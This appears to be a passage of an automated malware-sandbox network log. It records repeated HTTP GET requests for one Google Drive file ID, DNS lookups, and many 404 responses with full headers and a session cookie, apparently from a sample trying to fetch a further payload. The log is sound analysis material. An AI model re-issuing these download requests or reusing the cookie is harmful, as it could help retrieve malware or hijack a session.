Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTYurtJE-J8abv72OPbQC7EpGzekbbDHoqZf86aKBNOVd6j5mPUos2w7Z4qhWNGZBLVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:51 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-H2F3BWaFKNraajirQZouaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU; expires=Sun, 13-Jul-2025 02:08:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS4ryeFUyhwFjuOpt6QYUDgjoJi2VBccicqu5ufWYumIdgroJUCSj8mM19r44ZVx4k1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:53 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-U86fOgIHl5pQjiCls8rkPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRqF2IYrqX7cDZUoXqxfCyMv2WOiCJjvTb1rg5ymgcQsaObGM9uFj1TbuhxWhkX98EfD04dlYQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:55 GMTContent-Security-Policy: script-src 'nonce-mXOwVsDROoX8Z-deesKbMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6O_xi4eK0zYRESZytb29lZeZvY-qdXFCl6Zq1OlDyhx41r-2L-gopBxSuPSfk-5BhkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:58 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GQ0bSoF1BR3qls8a4lx-lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC750KnAA9VlVDqhnFQF1NlRG2LXgwFCaiEhIttJscnGJYEfwbhNr-GcmZJ3LPXyqtCIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:00 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-hLedHVU96__ZeWHD_hLiWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ-tKfMRuEQdnnFF7QRIVOa_P6icTjTqG5Ml-qicHRe_KMt9WkNN07-qK1i3wOQcXAra79gCtEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-HaRabD7Fy40heglCo9695Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSFiTvrky_OPF3K2xPo35YnJ1wssKCZQNAhQwvoI04yWOPVgJ0yoDVdZb2MX6ux4ZM7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:05 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-X6e-y3LR0GferA64o65Gaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSmBxuVFba_G4a6WzZ25kMXng3pWzsd6ys_JxET9QLqaRWh7ekzExVgCKaIs6GYUq5GgTZR0hoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZRQUhTXXa02TxOkI58e7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQoLyRS-oHiXpoR-g1-L-qKmBl47C5EWq_XcAWQcCaeMrxPDUk9D6ED7V5Slzvkpf-fY6aklD4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:10 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-bFacEBQz5V1q2gFCLXxOlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTIA-DAD5ppr2Ew3ud8I1TasNDxcu57noXqm06gXL9frYRWPnD28npAj0goAJY_SHSrU5sQNLYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-a_T3o6AIl95uqzSDAnQTKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRz0BZ16If8xH-NhFrbrc1_6R2IGeavS6YAiLSlCAa1djZsm5nANo5CcPkX7yF2clHLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-CxU-PktmcSjKlemqmuCGzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgScc9gfCOBOp-bO5kD6x936NuwmP0KNjRIJuiPBHC2lwUlcJ1WdB4zKYdynfBJjj_xZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-B8QuXgxITK5E3kt4cGdvzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQSvy0PWNCj3iEBmRNcR1lBwLRMjoa1-js4iGrdwzFfD35LRkARjDRNqMV_AyhXiiYRCvmwSBYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:19 GMTContent-Security-Policy: script-src 'nonce-J-AJO7s5GtBWLiEISVe_Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
